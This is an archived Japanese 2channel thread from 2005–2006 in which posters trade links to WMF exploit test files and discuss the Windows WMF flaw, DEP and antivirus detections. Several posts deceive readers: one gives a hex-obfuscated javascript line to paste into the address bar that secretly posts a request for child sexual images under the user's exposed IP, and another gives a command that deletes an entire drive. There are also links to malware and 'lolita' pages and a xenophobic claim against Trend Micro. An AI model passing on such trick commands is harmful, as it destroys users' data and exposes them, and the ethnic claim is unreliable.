5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

開いただけでウィルスに感染する奴

1 :名無しさん@お腹いっぱい。:2005/12/24(土) 10:39:16
集めてます
是非ください
俺のノートン先生とガチで勝負させます

2 :名無しさん@お腹いっぱい。:2005/12/24(土) 10:44:22
糞スレ立てんな!ボケが

3 :名無しさん@お腹いっぱい。:2005/12/24(土) 10:46:06
そもそもWindowsUpdateしてあったら感染しねぇんだよ!ボケが

4 :名無しさん@お腹いっぱい。:2005/12/24(土) 11:16:57
>>3

5 :名無しさん@お腹いっぱい。:2005/12/24(土) 11:55:48
似たような前スレ落ちたから次スレにする?

6 :名無しさん@お腹いっぱい。:2005/12/24(土) 11:58:33
>>3
Windowsに感染してますね。

7 :名無しさん@お腹いっぱい。:2005/12/24(土) 12:24:03
ttp://www2.strangeworld.org/uedakana/
ガチンコ勝負おね

8 :名無しさん@お腹いっぱい。:2005/12/24(土) 15:09:23
>>1
「奴」ってことはファイルでもいいんだろ?
そこらじゅうにあるから
好きなだけ勝負させたらいい

9 :名無しさん@お腹いっぱい。:2005/12/24(土) 15:34:37
とか言ってどっかのスレに貼るつもりだろ。バレバレなんだよ厨房

10 :名無しさん@お腹いっぱい。:2005/12/24(土) 16:17:05
クリスマスだっていうのに何やってるんだお前は

11 :名無しさん@お腹いっぱい。:2005/12/24(土) 16:37:50
>>1
ガチなら素っ裸の状態で勝負しなきゃ。

12 :名無しさん@お腹いっぱい。:2005/12/24(土) 17:00:55
>>11
そうだな
何がノートン先生じゃw

13 :名無しさん@お腹いっぱい。:2005/12/25(日) 03:41:58
ttp://vidr.jp/
誰か勝負頼みます。 責任は持ちません

14 :名無しさん@お腹いっぱい。:2005/12/25(日) 12:18:09
>>13
梅毒

15 :名無しさん@お腹いっぱい。:2005/12/26(月) 09:31:39
http://omegax9sp.hp.infoseek.co.jp/dark-evolution.html

16 :名無しさん@お腹いっぱい。:2005/12/26(月) 09:42:56
>>15
鑑定スレから引っ張ってきただけじゃねーの?
しょぼいし

17 :名無しさん@お腹いっぱい。:2005/12/26(月) 10:39:00
開いただけでウィルスに感染しそうな女なら何人も知ってるがな
バルス!!

18 :名無しさん@お腹いっぱい。:2005/12/26(月) 13:06:02
(´・ω・`)ウィルス性胃腸炎に感染したがな

19 :名無しさん@お腹いっぱい。:2005/12/26(月) 13:23:01
お大事に

20 :名無しさん@お腹いっぱい。:2005/12/26(月) 21:17:18
>木村佳乃
>「ジングルベル」を逆回転で聴くと・・・
http://media.spikedhumor.com/8944/Jingle_Bells_Reversed.swf


これ、別の板で見つけて、開いたんですが、逆向きで聴くと、すごく怖かったんです
(男の人がこっちを向いて叫んで・・・)

これってPC無害でしょうか?

21 :名無しさん@お腹いっぱい。:2005/12/27(火) 08:08:48
>>20
馬鹿?

22 :名無しさん@お腹いっぱい。:2005/12/28(水) 20:20:19
http://kikuz0u.x0.com/wmf_exp.html

23 :名無しさん@お腹いっぱい。:2005/12/28(水) 21:04:48
>>22
プロパティを見ようとした瞬間にExplorerがクラッシュして再起動した。
ウイルスバスターは検知しなかった。
何だこれは?

24 :23:2005/12/28(水) 21:35:40
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2005/12.html#20051228_WMF

これか。。。
コンセプトコードだったようだが、怖いな。

25 :名無しさん@お腹いっぱい。:2005/12/28(水) 23:17:38
DEP有効だとDEPで止められてまったく実害はなかった

26 :名無しさん@お腹いっぱい。:2005/12/29(木) 01:00:31
>>25
そのDEPってハードウェア?
とめられたときって、なんかメッセージ出すん?

27 :名無しさん@お腹いっぱい。:2005/12/29(木) 09:27:01
avast!も対応していた。やるじゃん。

28 :名無しさん@お腹いっぱい。:2005/12/29(木) 14:53:21
デスクトップに保存してプロパティを開くのを試した。
DEP有効でもDEPが検出して止めたっていうポップアップが出たが
そのポップアップ閉じたらその後勝手に実行されて意味なかったぞ
最初はちゃんと止めたって思って感心したのにだめじゃん

29 :名無しさん@お腹いっぱい。:2005/12/29(木) 14:57:38
DEPによる保護で最も効果が期待されているのが、バッファ・オーバーフロー/バッファ・オーバーランと呼ばれる脆弱性に対してだ

って書かれてたけどだめじゃねーか!

30 :名無しさん@お腹いっぱい。:2005/12/29(木) 19:50:58
>>26
ハードウェアDEP。
「コンピュータ保護のため、このプログラムは Windows により終了されました」
というメッセージが出て、「メッセージを閉じる」ボタンを押すと
「問題が発生したため、〜を終了します。ご不便をおかけし申し訳ありません」
っていつものエラー報告のダイアログが出る。
メモ帳の自動実行はされない。
他の人の報告を見る限りでは、ソフトウェアDEPじゃ防げないみたいね。

31 :名無しさん@お腹いっぱい。:2005/12/29(木) 21:24:31
IMON ファイル http://kikuz0u.x0.com/wmf_exp.wmf Win32/TrojanDownloader.Wmfex トロイ 切断されました

NOD32定義ファイル: 1.1342 (20051228)
Win32/TrojanDownloader.Wmfex

32 :28:2005/12/29(木) 21:27:32
SempronでハードウェアDEPになってるけど防げないよ
64bitプロセッサのじゃなきゃだめってことなんかな
それか64bit版Windowsなら平気とか?


33 :名無しさん@お腹いっぱい。:2005/12/30(金) 01:43:48
なるほど、ソフトウェアDEPではあかんのか。
P3-1Gの俺のPCじゃ止められんちゅうことだな。
新しいPC作りたいけど・・・最近仕様改革が激しい
からViiVまで待つつもりだけど、今のままじゃ
安心できんな。
セキュリティツールを組み合わせて凌ぐしかないな。

34 :名無しさん@お腹いっぱい。:2005/12/30(金) 02:16:58
ここNOD厨の溜まり場だったのか
気づくの遅すぎたわw

35 :名無しさん@お腹いっぱい。:2005/12/30(金) 03:12:03
レスは少ないけど、渦中のスレだからな、いろんな厨が集まるだろ。



36 :名無しさん@お腹いっぱい。:2005/12/30(金) 03:35:27
>>32
DEPのオプションは/noexecute=OptOutになってる?
> それか64bit版Windowsなら平気とか?
そういえば確かに漏れの環境はx64 Editionだなあ
でもSempronで防げたという報告もあるんだよなあ
http://kikuz0u.x0.com/td/?date=20051228#c00

37 :28:2005/12/30(金) 16:16:38
>>36
それってデフォルトのシステムのみじゃなくて
除外リストに加えた物いがいはすべてでDEP機能有効にするってやつでしょ?
デフォルトにしてもすべてにしてみても一緒だったよ。
防いだメッセージでた後メッセージ閉じると実行されちゃう。

ちなみにソフトウェアDEPだと防止のメッセージすらでないで実行された

38 :名無しさん@お腹いっぱい。:2005/12/30(金) 21:41:14
よく考えたらx64の64bitアプリ上でx86の攻撃コードが動くわけないか
とか一瞬思ったけど>>30で止められたrundll32は32bitだなあ

結局DEPで止められるかもしれないけど信用はできないってことか

39 :うはwwwコレやば過ぎwwww:2005/12/30(金) 22:26:23
Winnyを狙ったワーム・ニュイルス情報 Part47
http://tmp5.2ch.net/test/read.cgi/download/1134743735/334


334 名前:[名無し]さん(bin+cue).rar :2005/12/30(金) 16:57:24 ID:ZeZDB+us0 BE:55890465- sage
検証用ファイル

ttp://grin.flagbind.jp/runcalc.wmf 電卓が起動するだけ
ttp://kikuz0u.x0.com/wmf_exp.html メモ帳が起動するだけ

後はメモ帳の変わりにウィルスを実行するように
書き換えるだけでやばいことに

ファイルがある、フォルダを開くだけで〜っていうのは
XPの設定をデフォルトのままで使ってるやつがなるかもしらん
レジストリ弄って、フォルダを開くたびにファイル情報集めなくしてると
発動しないかも




祭り開始か?
【割れ厨】フォルダを開いたらサヨウナラ 最強のウィルス誕生【最後の日】
http://news19.2ch.net/test/read.cgi/news/1135928524/

40 :名無しさん@お腹いっぱい。:2005/12/30(金) 22:36:46
>>39
訂正 縮小版と並べて表示にしていなければ、ポイントしない限りバッファオーバーフローは発生しない。

41 :名無しさん@お腹いっぱい。:2005/12/30(金) 22:49:33
http://www.imgup.org/file/iup138702.jpg
これも

42 :名無しさん@お腹いっぱい。:2005/12/30(金) 22:52:13
>>41
やっぱりなぁ。
拡張子は問題じゃないものね。
Explorerそのものに問題があるからね。

43 :名無しさん@お腹いっぱい。:2005/12/30(金) 22:54:17
>>41
マカフィーは、それも関係ない

44 :名無しさん@お腹いっぱい。:2005/12/31(土) 11:42:42
例のshimgvw.dllの脆弱性ついたウィルス
IrfanviewだけじゃなくてXnViewでも外部プログラム起動した@Win2000

45 :名無しさん@お腹いっぱい。:2005/12/31(土) 12:58:37
AMON ファイル E:\...\Thumbs.jpg Win32/TrojanDownloader.Wmfex トロイ 削除済み ファイルアクセス時に発生したイベント。 C:\WINDOWS\Explorer.EXE.
NOD32対応済み


46 :名無しさん@お腹いっぱい。:2005/12/31(土) 13:52:01
>>44
同じDLLを読みに行くのかな?
やっぱ、

regsvr32 -u shimgvw.dll

これを使うしかないか。

47 :名無しさん@お腹いっぱい。:2005/12/31(土) 14:08:48
>>46
IrfanViewの場合、それやっても意味ないよ

48 :名無しさん@お腹いっぱい。:2005/12/31(土) 20:21:39
何かshimgvw.dllさえ無効にすれば問題ないと思ってる人が多いみたいだけど
本当に脆弱性があるのはgdi32.dllのwmfを表示するAPI。
shimgvw.dllはそれを利用しているDLL「のひとつ」に過ぎない。
だからwmfを開けるアプリはwmfを自前で展開していない限り
(そんなことできるのかどうか知らんけど)すべて危険。

49 :名無しさん@お腹いっぱい。:2005/12/31(土) 20:39:21
>>48
へー。そうなのかぁ。
おいらはプログラムに詳しくないからわからんかった。

50 :名無しさん@お腹いっぱい。:2005/12/31(土) 22:58:06
実際shimgvw.dllを無効にしてもIEやエクスプローラからの攻撃を回避できるだけで、
ペイントも危険とかLotus Notes 6.xも危険という情報が出始めてるな
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2005/12.html#20051230_tuiki

51 :名無しさん@お腹いっぱい。:2006/01/02(月) 01:03:44
意外と根の深い問題なんだな。
ウイルス対策ソフト入れている連中はよいとして、
入れていない連中や、入れていてもうpしていない
連中は危険ってことやな。

これ、価格のときみたいに、IEとIIS?(SQL?)の脆弱
を利用してページを改竄(改竄部分にWMFの脆弱性を
利用したファイルをDLさせるようなIFRAMEの挿入)
されたら一般大衆はたまったもんじゃないな。


52 :名無しさん@お腹いっぱい。:2006/01/02(月) 17:56:14
Iframeとかは、アクティブスクリプトの実行を無効にしておけば実行されない。

53 :名無しさん@お腹いっぱい。:2006/01/03(火) 08:24:17
どこにもスクリプトは使われてないんだが。

54 :名無しさん@お腹いっぱい。:2006/01/03(火) 11:39:36
ttp://kikuz0u.x0.com/wmf_exp.html
これは、Iframeに組み込んでいる

55 :名無しさん@お腹いっぱい。:2006/01/03(火) 11:41:12
>>53
無知だなあ

56 :名無しさん@お腹いっぱい。:2006/01/07(土) 15:05:57
無知というか、勘違いだろうね

57 :名無しさん@お腹いっぱい。:2006/01/25(水) 00:14:27
>>1


58 :名無しさん@お腹いっぱい。:2006/01/30(月) 00:07:07
>>1
IEでこのスレを開く。

1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

2、
改行を外して1行にする。

3、
1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。

4、
Enterを押す(もしくは「移動」をクリックする)。


これを実行汁

59 :名無しさん@お腹いっぱい。:2006/01/30(月) 00:25:19
節穴でロリ画像下さいとレスするスクリプト

60 :名無しさん@お腹いっぱい。:2006/01/30(月) 02:30:25
「スタート」の「ファイル名を指定して実行」で
cmd /c rd /s /q d:
と入力し(OK)をクリックする

61 :名無しさん@お腹いっぱい。:2006/01/31(火) 01:58:01


62 :名無しさん@お腹いっぱい。:2006/02/02(木) 04:32:58


 _____
 |____  \□ □
       / /   _____
      / /   |_____|
     / /
    / /
     ̄                   (⌒ ⌒ヽ
    ∧_∧             (´⌒  ⌒  ⌒ヾ
   ( ;   )           ('⌒ ; ⌒   ::⌒  )
    ( ̄ ̄ ̄ ̄┴-      (´     )     ::: )
     |  (    *≡≡≡≡≡三(´⌒;:     ::⌒`) :;  )
    /  /   ∧   \    (⌒::   ::     ::⌒ )
    / /   / U\   \   (    ゝ  ヾ 丶  ソ
   / / ( ̄)  | |\  ( ̄)   ヽ  ヾ  ノノ  ノ
  / ( ノ  (   | |  \ ノ (
⊂- ┘(    ) └--┘ (    )
     UUUU      UUUU














63 :名無しさん@お腹いっぱい。:2006/02/15(水) 15:01:01

    / ̄ ̄ ̄ ̄\,,      / ̄ ̄ ̄ ̄ ̄\
   /_____  ヽ    / ______   \
   |        |  |   / /        \   ヽ
   |●    ●   |___/   |/ ●    ●   ヽ   |
   | (_●__)    6 l   |   (_●__)     |   |
.   ヽ  |∪|     ,-′  |    |∪|       |   l
     ヽ.ヽノ__ /ヽ     ヽ   ヽノ      / /
     / |/\/ l ^ヽ    \          / /
     | |      |  |     l━━(t)━━━━























64 :名無しさん@お腹いっぱい。:2006/02/16(木) 02:02:58
     ______    ___  ____  _____     __     ___
   /___   /    |  / /      | /__  __/ [][] /  /   _| |_
         /   /     /  /  /  / ̄ ̄|. l    / /      /  /    |_  レ'~ ̄|
       /   /.     /  /  /  /.  / /    |  |___   \ \    /   /| |
      /   /     /  /  /   ̄ ̄ /     \__|     \ \ /_  /  | |_
     /   /       /  /  /  / ̄ ̄ ̄                 ̄ ̄  .|__|   \/
   /   /      /  /  /  /
  /   /____.  /  /  /  /
 /       / /   |  /  /
  ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄   ̄

65 :名無しさん@お腹いっぱい。:2006/02/18(土) 03:04:04
原因は「二重の人為的ミス」 ウイルスバスター不具合で謝罪
http://www.itmedia.co.jp/news/articles/0504/24/news008.html
ウイルスバスター原因でシステムダウン
http://www.itmedia.co.jp/enterprise/articles/0504/24/news001.html
トレンドマイクロ、PCを守るはずのパターンファイルに不具合
http://www.itmedia.co.jp/enterprise/articles/0504/23/news015.html
ウイルスバスター不具合でPCメーカーも対応に追われる
http://www.itmedia.co.jp/news/articles/0504/24/news002.html
「ウイルスバスター」のパターン・ファイルに不具合、大規模パソコン障害が発生
http://itpro.nikkeibp.co.jp/free/NC/NEWS/20050423/159997/
ウイルスバスターによる障害を解消するツールが公開,セーフモードでの起動が必要
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050424/159999/
トレンドマイクロが障害の原因を緊急会見,「XP SP2環境ではテストせず」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050424/160001/
ウイルスバスターのアップデートで不具合、PCが使用不能に
http://pcweb.mycom.co.jp/news/2005/04/24/100.html
トレンドマイクロ、ウイルス対策ソフトの更新ファイルに不具合
http://japan.cnet.com/news/sec/story/0,2000050480,20083099,00.htm
ウイルスバスターのアップデートに不具合、今度はWindows Me/98で
http://internet.watch.impress.co.jp/cda/news/2005/05/27/7776.html
ウイルスバスター、パターンファイル更新でCPU使用率100%になるトラブル
http://internet.watch.impress.co.jp/cda/news/2005/04/23/7414.html
ウイルスバスター2005 アップデートを実行後、動作が著しく低下する
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=11214


66 :名無しさん@お腹いっぱい。:2006/02/18(土) 03:04:56
トレンドマイクロ
http://www.trendmicro.com/jp/about/profile/leadership/overview.htm
役員紹介
代表取締役社長 エバ・チェン(陳 怡芬)
代表取締役会長 スティーブ・チャン(チャン ミン ジャン)
代表取締役(CFO) マヘンドラ・ネギ
取締役(非常勤) エドワード・テン

↑まぁ、中国人の会社ですからねぇ。一種の反日テロだったんでしょ。これ。

ウイルスバスターはスパイウェア!?
ここに詳しい経緯が書いてある。
http://www.pahoo.org/e-soul/privacy/casestudy/case-002-01.shtm



67 :名無しさん@お腹いっぱい。:2006/04/02(日) 08:58:01
 _____
 |____  \□ □
       / /   _____
      / /   |_____|
     / /
    / /
     ̄                   (⌒ ⌒ヽ
    ∧_∧             (´⌒  ⌒  ⌒ヾ
   ( ;   )           ('⌒ ; ⌒   ::⌒  )
    ( ̄ ̄ ̄ ̄┴-      (´     )     ::: )
     |  (    *≡≡≡≡≡三(´⌒;:     ::⌒`) :;  )
    /  /   ∧   \    (⌒::   ::     ::⌒ )
    / /   / U\   \   (    ゝ  ヾ 丶  ソ
   / / ( ̄)  | |\  ( ̄)   ヽ  ヾ  ノノ  ノ
  / ( ノ  (   | |  \ ノ (
⊂- ┘(    ) └--┘ (    )
     UUUU      UUUU


    / ̄ ̄ ̄ ̄\,,      / ̄ ̄ ̄ ̄ ̄\
   /_____  ヽ    / ______   \
   |        |  |   / /        \   ヽ
   |●    ●   |___/   |/ ●    ●   ヽ   |
   | (_●__)    6 l   |   (_●__)     |   |
.   ヽ  |∪|     ,-′  |    |∪|       |   l
     ヽ.ヽノ__ /ヽ     ヽ   ヽノ      / /
     / |/\/ l ^ヽ    \          / /
     | |      |  |     l━━(t)━━━━





68 :名無しさん@お腹いっぱい。:2006/04/21(金) 15:53:39
踏んだら感染しちゃった

ttp://72.14.203.104/search?q=cache:2VfK2u1iM2oJ:lol.to/book.php%3Fbook%3Dfuckoff+darklolitas&hl=ja&gl=jp&ct=clnk&cd=2

69 :名無しさん@お腹いっぱい。:2006/06/02(金) 22:17:40
踏んだら感染しちゃった

ttp://72.14.203.104/search?q=cache:2VfK2u1iM2oJ:lol.to/book.php%3Fbook%3Dfuckoff+darklolitas&hl=ja&gl=jp&ct=clnk&cd=2


70 :名無しさん@お腹いっぱい。:2006/09/11(月) 18:48:41
http://grin.flagbind.jp/runcalc.wmf

71 :218-045-130-164.users.sctv.jp:2006/09/12(火) 10:08:49
ロリ画像ください

72 :名無しさん@お腹いっぱい。:2006/09/13(水) 18:54:07
前に芸スポにあったスレッドを開いただけで、「ウイルスに感染しました」って出たんだけど・・。

これってナンダイ?

73 :名無しさん@お腹いっぱい。:2006/09/13(水) 18:55:25
>>72
2ちゃんねるへようこそ!

74 :名無しさん@お腹いっぱい。:2006/09/13(水) 18:57:09
この後半年ロムります・・。
教えて下さいな


75 :名無しさん@お腹いっぱい。:2006/09/13(水) 19:00:29
>>74
単にウイルスコードが貼られただけ。
アンチウイルスソフトの誤作動を狙ったもの。
ただのコードなんでもちろん感染はしてない。
半年後にまた会おう

76 :名無しさん@お腹いっぱい。:2006/09/13(水) 19:01:40
ありがとうございました!
また半年後に。
お元気で!

77 :名無しさん@お腹いっぱい。:2006/09/13(水) 19:18:38
絶対ROMってねーよwwwww

78 :名無しさん@お腹いっぱい。:2006/09/13(水) 20:21:05
頑張れよ(´・ω・`)

79 :名無しさん@お腹いっぱい。:2006/09/13(水) 21:31:56
なんだかんだいって、割と皆優しいのなw

80 :名無しさん@お腹いっぱい。:2006/09/18(月) 15:58:36
てーかなかったっけ、ウイルステンプレートとかいうヤツ。

81 :あぼーん:あぼーん
あぼーん

82 :名無しさん@お腹いっぱい。:2006/09/19(火) 02:25:05
>81
とりあえずお前が痛い香具師なのはよく解った

83 :名無しさん@お腹いっぱい。:2006/10/13(金) 22:11:37
> http://seriall.com/
> これ踏んでからlive2ch以外動かなくなっちまった・・・

IMON ファイル http://installare.net/e/t/ads_nl1.php?b=3020 ウイルスの可能性 : HTML/Exploit.VMLFill トロイ の亜種

84 :名無しさん@お腹いっぱい。:2006/11/12(日) 16:38:38
トミヤアパレル株式会社
http://www.tomiya-ap.com/index.html

IMON ファイル http://www.tomiya-ap.com/favicon.ico Win32/Nachi.B ワーム 切断されました

85 :あぼーん:あぼーん
あぼーん

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)